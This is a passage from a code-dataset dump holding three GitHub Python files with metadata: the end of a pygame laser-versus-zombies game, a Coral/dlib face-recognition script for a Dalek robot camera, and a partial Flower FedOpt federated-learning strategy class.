pygame.Rect(550, 550, 148, 90)\n if button_exit_rect.collidepoint((mx, my)):\n screen.blit(button_exit_hover, (550, 550))\n if click:\n pygame.exit()\n sys.exit()\n click = False\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n if event.type == pygame.MOUSEBUTTONDOWN:\n if event.button == 1:\n click = True\n\n pygame.display.update()\n music.stop()\n game()\n\ndef pause():\n global one_moving_left, one_moving_right, one_moving_up, one_moving_down\n global two_moving_left, two_moving_right, two_moving_up, two_moving_down\n\n paused_img = pygame.image.load(\"misc/paused_img.png\")\n screen.blit(paused_img, (0, 0))\n\n music.set_volume(0.2)\n\n pause = True\n while pause:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n one_moving_up = False\n one_moving_down = False\n one_moving_left = False\n one_moving_right = False\n two_moving_up = False\n two_moving_down = False\n two_moving_left = False\n two_moving_right = False\n pause = False\n pygame.display.update()\n music.set_volume(1)\n\n# GROUPS\nzombie_group = pygame.sprite.Group()\n\nscore = 0\nhighscore = 0\ndef setScore():\n global score\n score += 1\ndef getScore():\n global score\n return score\n\ndef getHighscore():\n global score, highscore\n if score > highscore:\n highscore = score\n return highscore\n\ndef setScoree():\n global score\n score = 0\n# ----------------------------------------------------- MAIN ----------------------------------------------------------\n\nclock = pygame.time.Clock()\nclick = False\nmusicB = True\n\n# Character(number, x, y, scale, speed)\nmain1 = Character('1', 400, 400, 1, 3)\nmain2 = Character('2', 600, 400, 1, 3)\nmain = [main1, main2]\n\ndef game():\n max_zombie_timer = 300\n zombie_timer = 0 # 5 sekundi jer 300/FPS = 5, FPS = 60\n score = 0\n setScoree()\n tutorial_timer = 300\n\n global one_moving_left, one_moving_right, one_moving_up, one_moving_down\n global two_moving_left, two_moving_right, two_moving_up, two_moving_down\n one_moving_up = False\n one_moving_down = False\n one_moving_left = False\n one_moving_right = False\n two_moving_up = False\n two_moving_down = False\n two_moving_left = False\n two_moving_right = False\n\n global main1, main2\n global main\n main1 = Character('1', 400, 400, 1, 3)\n main2 = Character('2', 600, 400, 1, 3)\n main = [main1, main2]\n\n first_time = True\n\n main_menu_music.stop()\n music.play(-1, 0, 0)\n\n run = True\n while run:\n clock.tick(FPS)\n draw_bg()\n\n if first_time:\n if tutorial_timer > 0:\n draw_tutorial()\n if tutorial_timer == 0:\n first_time = False\n tutorial_timer -= 1\n\n score_text = font_score.render(str(score), False, WHITE)\n screen.blit(score_text, (30, 1))\n\n main1.draw()\n main2.draw()\n\n main1.move(one_moving_left, one_moving_right, one_moving_up, one_moving_down)\n main2.move(two_moving_left, two_moving_right, two_moving_up, two_moving_down)\n\n laser = pygame.draw.line(screen, WHITE, (main1.rect.centerx + 12, main1.rect.centery + 10), (main2.rect.centerx - 25, main2.rect.centery + 10), 6)\n\n\n # Zombie(x, y, scale, speed)\n if zombie_timer == max_zombie_timer:\n # za koliko ce enemy biti spawnan van ekrana = 10\n ran = random.randint(1, 4)\n if ran == 1:\n zombie = Zombie((SCREEN_WIDTH + 10), (random.randint(0, SCREEN_HEIGHT)), 0.8, 1)\n if ran == 2:\n zombie = Zombie((random.randint(0, SCREEN_WIDTH)), (-10), 0.8, 1)\n if ran == 3:\n zombie = Zombie((SCREEN_WIDTH - 10), (random.randint(0, SCREEN_HEIGHT)), 0.8, 1)\n if ran == 4:\n zombie = Zombie((random.randint(0, SCREEN_WIDTH)), (SCREEN_HEIGHT + 10), 0.8, 1)\n zombie_group.add(zombie)\n max_zombie_timer -= 10\n zombie_timer = 0\n zombie_timer += 1\n\n zombie_group.draw(screen)\n for zombie in zombie_group:\n zombie.move()\n zombie.draw()\n if laser.collidepoint(zombie.rect.center) and distance_point_line(zombie.rect.center, main1.rect.center,\n main2.rect.center) < 10:\n laser_sfx.play(1, 0, 0)\n zombie.kill()\n setScore()\n score += 1\n\n # quit\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n\n # keyboard presses\n\n if event.type == pygame.KEYDOWN:\n # movement\n if event.key == pygame.K_a:\n one_moving_left = True\n if event.key == pygame.K_d:\n one_moving_right = True\n if event.key == pygame.K_w:\n one_moving_up = True\n if event.key == pygame.K_s:\n one_moving_down = True\n\n if event.key == pygame.K_LEFT:\n two_moving_left = True\n if event.key == pygame.K_RIGHT:\n two_moving_right = True\n if event.key == pygame.K_UP:\n two_moving_up = True\n if event.key == pygame.K_DOWN:\n two_moving_down = True\n\n if event.key == pygame.K_ESCAPE:\n pause()\n\n if event.type == pygame.KEYUP:\n # -movement\n if event.key == pygame.K_a:\n one_moving_left = False\n if event.key == pygame.K_d:\n one_moving_right = False\n if event.key == pygame.K_w:\n one_moving_up = False\n if event.key == pygame.K_s:\n one_moving_down = False\n\n if event.key == pygame.K_LEFT:\n two_moving_left = False\n if event.key == pygame.K_RIGHT:\n two_moving_right = False\n if event.key == pygame.K_UP:\n two_moving_up = False\n if event.key == pygame.K_DOWN:\n two_moving_down = False\n\n pygame.display.update()\n\ndef main_menu():\n main_menu_music.play(-1, 0, 0)\n button_play = pygame.image.load('ui/button_play.png')\n button_play_hover = pygame.image.load('ui/button_play_hover.png')\n button_exit = pygame.image.load('ui/button_exit.png')\n button_exit_hover = pygame.image.load('ui/button_exit_hover.png')\n while True:\n clock.tick(FPS)\n draw_bg()\n global click, musicB\n\n mx, my = pygame.mouse.get_pos()\n\n logo = pygame.image.load('misc/logo.png')\n screen.blit(logo, (100, 200))\n\n screen.blit(button_play, (100, 400))\n button_play_rect = pygame.Rect(100, 400, 350, 100)\n if button_play_rect.collidepoint((mx, my)):\n screen.blit(button_play_hover, (100, 400))\n if click:\n main_menu_music.fadeout(2000)\n fade(SCREEN_WIDTH, SCREEN_HEIGHT, button_play, button_exit, logo)\n game()\n screen.blit(button_exit, (550, 400))\n button_exit_rect = pygame.Rect(550, 400, 350, 100)\n if button_exit_rect.collidepoint((mx, my)):\n screen.blit(button_exit_hover, (550, 400))\n if click:\n pygame.quit()\n sys.exit()\n click = False\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n if event.type == pygame.MOUSEBUTTONDOWN:\n if event.button == 1:\n click = True\n\n pygame.display.update()\n\n\nmain_menu()", "repo_name": "Rijad-Ismailovic/Laser-Bound", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 15487, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pygame.init", "line_number": 6, "usage_type": "call"}, {"api_name": "pygame.mixer.init", "line_number": 7, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 7, "usage_type": "name"}, {"api_name": "pygame.font.init", "line_number": 8, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 8, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 14, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 14, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 20, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pygame.display.set_icon", "line_number": 21, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 23, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 23, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 24, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 24, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 25, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 25, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 28, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 28, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 31, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 31, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 33, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 33, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 37, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 37, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 38, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 39, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 39, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 42, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 42, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 43, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 43, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 57, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 63, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 63, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 64, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 64, "usage_type": "attribute"}, {"api_name": "math.pi", "line_number": 98, "usage_type": "attribute"}, {"api_name": "math.atan2", "line_number": 98, "usage_type": "call"}, {"api_name": "pygame.transform.rotozoom", "line_number": 100, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 100, "usage_type": "attribute"}, {"api_name": "pygame.transform.rotozoom", "line_number": 103, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 103, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 108, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Sprite.__init__", "line_number": 110, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 110, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 113, "usage_type": "call"}, {"api_name": "pygame.image.load", "line_number": 116, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 116, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 117, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 117, "usage_type": "attribute"}, {"api_name": "math.pi", "line_number": 151, "usage_type": "attribute"}, {"api_name": "math.atan2", "line_number": 151, "usage_type": "call"}, {"api_name": "pygame.transform.rotozoom", "line_number": 152, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 152, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 161, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 161, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 162, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 162, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 163, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 163, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 164, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 164, "usage_type": "attribute"}, {"api_name": "pygame.math.Vector2", "line_number": 169, "usage_type": "call"}, {"api_name": "pygame.math", "line_number": 169, "usage_type": "attribute"}, {"api_name": "pygame.math.Vector2", "line_number": 170, "usage_type": "call"}, {"api_name": "pygame.math", "line_number": 170, "usage_type": "attribute"}, {"api_name": "pygame.math.Vector2", "line_number": 171, "usage_type": "call"}, {"api_name": "pygame.math", "line_number": 171, "usage_type": "attribute"}, {"api_name": "pygame.Surface", "line_number": 176, "usage_type": "call"}, {"api_name": "pygame.display.update", "line_number": 185, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 185, "usage_type": "attribute"}, {"api_name": "pygame.time.delay", "line_number": 186, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 186, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 191, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 191, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 192, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 192, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 193, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 193, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 194, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 194, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 195, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 195, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pos", "line_number": 205, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 205, "usage_type": "attribute"}, {"api_name": "pygame.Rect", "line_number": 208, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 216, "usage_type": "call"}, {"api_name": "pygame.exit", "line_number": 220, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 221, "usage_type": "call"}, {"api_name": "pygame.event.get", "line_number": 224, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 224, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 225, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 226, "usage_type": "call"}, {"api_name": "pygame.MOUSEBUTTONDOWN", "line_number": 227, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 231, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 231, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 239, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 239, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 246, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 246, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 247, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 248, "usage_type": "call"}, {"api_name": "pygame.KEYDOWN", "line_number": 250, "usage_type": "attribute"}, {"api_name": "pygame.K_ESCAPE", "line_number": 251, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 261, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 261, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 265, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 265, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 287, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 287, "usage_type": "attribute"}, {"api_name": "pygame.draw.line", "line_number": 346, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 346, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 352, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 354, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 356, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 358, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 360, "usage_type": "call"}, {"api_name": "pygame.event.get", "line_number": 378, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 378, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 379, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 380, "usage_type": "call"}, {"api_name": "pygame.KEYDOWN", "line_number": 384, "usage_type": "attribute"}, {"api_name": "pygame.K_a", "line_number": 386, "usage_type": "attribute"}, {"api_name": "pygame.K_d", "line_number": 388, "usage_type": "attribute"}, {"api_name": "pygame.K_w", "line_number": 390, "usage_type": "attribute"}, {"api_name": "pygame.K_s", "line_number": 392, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 395, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 397, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 399, "usage_type": "attribute"}, {"api_name": "pygame.K_DOWN", "line_number": 401, "usage_type": "attribute"}, {"api_name": "pygame.K_ESCAPE", "line_number": 404, "usage_type": "attribute"}, {"api_name": "pygame.KEYUP", "line_number": 407, "usage_type": "attribute"}, {"api_name": "pygame.K_a", "line_number": 409, "usage_type": "attribute"}, {"api_name": "pygame.K_d", "line_number": 411, "usage_type": "attribute"}, {"api_name": "pygame.K_w", "line_number": 413, "usage_type": "attribute"}, {"api_name": "pygame.K_s", "line_number": 415, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 418, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 420, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 422, "usage_type": "attribute"}, {"api_name": "pygame.K_DOWN", "line_number": 424, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 427, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 427, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 431, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 431, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 432, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 432, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 433, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 433, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 434, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 434, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pos", "line_number": 440, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 440, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 442, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 442, "usage_type": "attribute"}, {"api_name": "pygame.Rect", "line_number": 446, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 454, "usage_type": "call"}, {"api_name": "pygame.quit", "line_number": 458, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 459, "usage_type": "call"}, {"api_name": "pygame.event.get", "line_number": 462, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 462, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 463, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 464, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 465, "usage_type": "call"}, {"api_name": "pygame.MOUSEBUTTONDOWN", "line_number": 466, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 470, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 470, "usage_type": "attribute"}]}
+{"seq_id": "34839705788", "text": "import time\nimport sys\nimport argparse\n\n# import image and DL processing\nimport cv2\nimport numpy as np\nimport dlib\nfrom random import randrange\n# from edgetpu.detection.engine import DetectionEngine\nfrom pycoral.adapters import common\nfrom pycoral.adapters import detect\nfrom pycoral.utils.edgetpu import make_interpreter\nfrom scipy.interpolate import UnivariateSpline\n\nfrom imutils.video import VideoStream\nfrom PIL import Image, ImageDraw\n\n# import local helper classes\nfrom faceextractor import FaceDataExtractor\nfrom recognizer import FaceRecognizer\n\n# construct the argument parser and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-o\", \"--output\", default=False, action=\"store_true\",\n\thelp=\"Display dalek PoV\")\nap.add_argument(\"-f\", \"--face\", type=float, default=0.7,\n\thelp=\"Face detection certainty\")\nap.add_argument(\"-r\", \"--recognize\", type=float, default=0.7,\n\thelp=\"Face recognition certainty\")\nargs = vars(ap.parse_args())\n\nprint(args)\n\nprint(\"Loading face detection engine...\")\ninterpreter = make_interpreter(\"/home/pi/coral-dalek/mobilenet_ssd_v2_face_quant_postprocess_edgetpu.tflite\")\ninterpreter.allocate_tensors()\n\nprint(\"Loading face landmark detection engine...\")\nshape_pred = dlib.shape_predictor(\"./shape_predictor_5_face_landmarks.dat\")\nface_ext = FaceDataExtractor()\nprint(\"Loading face recognitn engine...\")\nfacerec = dlib.face_recognition_model_v1(\"./dlib_face_recognition_resnet_model_v1.dat\")\nface_recog = FaceRecognizer()\n\n# https://www.askaswiss.com/2016/02/how-to-manipulate-color-temperature-opencv-python.html\n\nif args['output']:\n pov = 0\n overlay=[]\n overlay.append(cv2.imread('dalekpov-a.png'))\n overlay.append(cv2.imread('dalekpov-b.png'))\n overlay.append(cv2.imread('dalekpov-c.png'))\n\n def create_transform(x, y):\n spl = UnivariateSpline(x, y)\n return spl(range(256))\n\n inc_col = create_transform([0, 64, 128, 192, 256],[150, 175, 200, 225, 256])\n dec_col = create_transform([0, 64, 128, 192, 256],[28, 64, 90, 110, 128])\n\nprint(\"Starting video capture\")\n\nvc = cv2.VideoCapture(0)\nif not vc.isOpened():\n print(\"Cannot open USB camera.\")\n exit()\n\ncap_width = vc.get(cv2.CAP_PROP_FRAME_WIDTH)\ncap_height = vc.get(cv2.CAP_PROP_FRAME_HEIGHT)\ncap_fps = vc.get(cv2.CAP_PROP_FPS)\nprint(cap_width,\" x \", cap_height,\" @ \", cap_fps)\n\nprint(\"Entering main loop, press CTRL+C to exit...\")\nwhile True:\n try:\n ret, frame = vc.read()\n if not ret:\n print(\"No frame received from camera; exiting...\")\n break\n # Convert frame from color_coverted = cv2.cvtColor(opencv_image, cv2.COLOR_BGR2RGB)\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n image = Image.fromarray(frame)\n _, scale = common.set_resized_input(\n interpreter, image.size, lambda size: image.resize(size, Image.ANTIALIAS))\n interpreter.invoke()\n face_box_list = detect.get_objects(interpreter, args['face'], scale)\n\n draw = ImageDraw.Draw(image)\n for face in face_box_list:\n bbox = face.bbox\n draw.rectangle([(bbox.xmin, bbox.ymin), (bbox.xmax, bbox.ymax)], outline='black')\n box = dlib.rectangle(left = bbox.xmin,\n right = bbox.xmax,\n top = bbox.ymin,\n bottom = bbox.ymax)\n shape = shape_pred(frame, box)\n if shape:\n face_chip_img = dlib.get_face_chip(frame, shape)\n face_descriptor = facerec.compute_face_descriptor(face_chip_img)\n name = face_recog.recognize_face(face_descriptor, threshold = args['recognize'])\n if name:\n if output:\n draw.text((bbox.xmin, bbox.ymin - 20), name, fill='black')\n else:\n print(name)\n \n if args['output']:\n displayImage = np.asarray(image)\n blue, green, red = cv2.split(displayImage)\n red = cv2.LUT(red, dec_col).astype(np.uint8)\n blue = cv2.LUT(blue, dec_col).astype(np.uint8)\n green = cv2.LUT(green, inc_col).astype(np.uint8)\n displayImage = cv2.merge((red, green, blue))\n\n # displayImage = cv2.cvtColor(displayImage, cv2.COLOR_BGR2GRAY)\n if (randrange(10) > 6): pov = randrange(3)\n displayImage = cv2.addWeighted(displayImage,0.8,overlay[pov],0.2,0)\n cv2.imshow('Dalek Fry Eyestalk PoV', displayImage)\n if cv2.waitKey(1) == ord('q'):\n raise KeyboardInterrupt\n except KeyboardInterrupt:\n vc.release()\n cv2.destroyAllWindows()\n print(\"Program halted by CTRL+C\")\n sys.exit(0)", "repo_name": "hopkira/coral-dalek", "sub_path": "new_vision.py", "file_name": "new_vision.py", "file_ext": "py", "file_size_in_byte": 4719, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 24, "usage_type": "call"}, {"api_name": "pycoral.utils.edgetpu.make_interpreter", "line_number": 36, "usage_type": "call"}, {"api_name": "dlib.shape_predictor", "line_number": 40, "usage_type": "call"}, {"api_name": "faceextractor.FaceDataExtractor", "line_number": 41, "usage_type": "call"}, {"api_name": "dlib.face_recognition_model_v1", "line_number": 43, "usage_type": "call"}, {"api_name": "recognizer.FaceRecognizer", "line_number": 44, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 51, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 52, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 53, "usage_type": "call"}, {"api_name": "scipy.interpolate.UnivariateSpline", "line_number": 56, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 64, "usage_type": "call"}, {"api_name": "cv2.CAP_PROP_FRAME_WIDTH", "line_number": 69, "usage_type": "attribute"}, {"api_name": "cv2.CAP_PROP_FRAME_HEIGHT", "line_number": 70, "usage_type": "attribute"}, {"api_name": "cv2.CAP_PROP_FPS", "line_number": 71, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 82, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 82, "usage_type": "attribute"}, {"api_name": "PIL.Image.fromarray", "line_number": 83, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 83, "usage_type": "name"}, {"api_name": "pycoral.adapters.common.set_resized_input", "line_number": 84, "usage_type": "call"}, {"api_name": "pycoral.adapters.common", "line_number": 84, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 85, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 85, "usage_type": "name"}, {"api_name": "pycoral.adapters.detect.get_objects", "line_number": 87, "usage_type": "call"}, {"api_name": "pycoral.adapters.detect", "line_number": 87, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 89, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 89, "usage_type": "name"}, {"api_name": "dlib.rectangle", "line_number": 93, "usage_type": "call"}, {"api_name": "dlib.get_face_chip", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 109, "usage_type": "call"}, {"api_name": "cv2.split", "line_number": 110, "usage_type": "call"}, {"api_name": "cv2.LUT", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 111, "usage_type": "attribute"}, {"api_name": "cv2.LUT", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 112, "usage_type": "attribute"}, {"api_name": "cv2.LUT", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 113, "usage_type": "attribute"}, {"api_name": "cv2.merge", "line_number": 114, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 117, "usage_type": "call"}, {"api_name": "cv2.addWeighted", "line_number": 118, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 119, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 120, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 124, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 126, "usage_type": "call"}]}
+{"seq_id": "3927966183", "text": "# ! This code has been copied from https://github.com/adap/flower/blob/main/src/py/flwr/server/strategy/fedopt.py commit 59a32d5\n# and removed the annoying requirement of having to pass the initialized model at construction time\n\nfrom tkinter import E\nfrom typing import Callable, Dict, Optional, Tuple\n\nfrom flwr.common import Parameters, Scalar, Weights, parameters_to_weights\n\nfrom flwr.server.strategy import FedAvg\n\nimport pickle\n\nclass FedOpt(FedAvg):\n \"\"\"Configurable FedAdagrad strategy implementation.\"\"\"\n\n # pylint: disable=too-many-arguments,too-many-instance-attributes,too-many-locals\n def __init__(\n self,\n *,\n fraction_fit: float = 0.1,\n fraction_eval: float = 0.1,\n min_fit_clients: int = 2,\n min_eval_clients: int = 2,\n min_available_clients: int = 2,\n eval_fn: Optional[\n Callable[[Weights], Optional[Tuple[float, Dict[str, Scalar]]]]\n ] = None,\n on_fit_config_fn: Optional[Callable[[int], Dict[str, Scalar]]] = None,\n on_evaluate_config_fn: Optional[Callable[[int], Dict[str, Scalar]]] = None,\n accept_failures: bool = True,\n initial_parameters: Parameters,\n eta: float = 1e-1,\n eta_l: float = 1e-1,\n beta_1: float = 0.0,\n beta_2: float = 0.0,\n tau: float = 1e-9,\n ) -> None:\n \"\"\"Federated Optim strategy interface.\n Implementation based on https://arxiv.org/abs/2003.00295\n Args:\n fraction_fit (float, optional): Fraction of clients used during\n training. Defaults to 0.1.\n fraction_eval (float, optional): Fraction of clients used during\n validation. Defaults to 0.1.\n min_fit_clients (int, optional): Minimum number of clients used\n during training. Defaults to 2.\n min_eval_clients (int, optional): Minimum number of clients used\n during validation. Defaults to 2.\n min_available_clients (int, optional): Minimum number of total\n clients in the system. Defaults to 2.\n eval_fn (Callable[[Weights], Optional[Tuple[float, float]]], optional):\n Function used for validation. Defaults to None.\n on_fit_config_fn (Callable[[int], Dict[str, str]], optional):\n Function used to configure training. Defaults to None.\n on_evaluate_config_fn (Callable[[int], Dict[str, str]], optional):\n Function used to configure validation. Defaults to None.\n accept_failures (bool, optional): Whether or not accept rounds\n containing failures. Defaults to True.\n initial_parameters (Parameters): Initial set of parameters from the server.\n eta (float, optional): Server-side learning rate. Defaults to 1e-1.\n eta_l (float, optional): Client-side learning rate. Defaults to 1e-1.\n beta_1 (float, optional): Momentum parameter. Defaults to 0.0.\n beta_2 (float, optional): Second moment parameter. Defaults to 0.0.\n tau (float, optional): Controls the algorithm's degree of adaptability.\n Defaults to 1e-9.\n \"\"\"\n super().__init__(\n fraction_fit=fraction_fit,\n fraction_eval=fraction_eval,\n min_fit_clients=min_fit_clients,\n min_eval_clients=min_eval_clients,\n min_available_clients=min_available_clients,\n eval_fn=eval_fn,\n on_fit_config_fn=on_fit_config_fn,\n on_evaluate_config_fn=on_evaluate_config_fn,\n accept_failures=accept_failures,\n initial_parameters=initial_parameters,\n )\n\n if initial_parameters:\n self.current_weights = parameters_to_weights(initial_parameters)\n else:\n self.current_weights = None\n # ! this will trigger a crash if the user doesn't copy the sever weights before the 1st round begin\n print('type of current weights:',type(self.current_weights))\n self.eta = eta\n self.eta_l = eta_l\n self.tau = tau\n self.beta_1 = beta_1\n self.beta_2 = beta_2\n\n def __repr__(self) -> str:\n rep = f\"FedOpt(accept_failures={self.accept_failures})\"\n return rep", "repo_name": "royson/fedl2p", "sub_path": "src/server/strategies/fedopt.py", "file_name": "fedopt.py", "file_ext": "py", "file_size_in_byte": 4285, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 10, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flwr.server.strategy.FedAvg", "line_number": 13, "usage_type": "name"}, {"api_name": 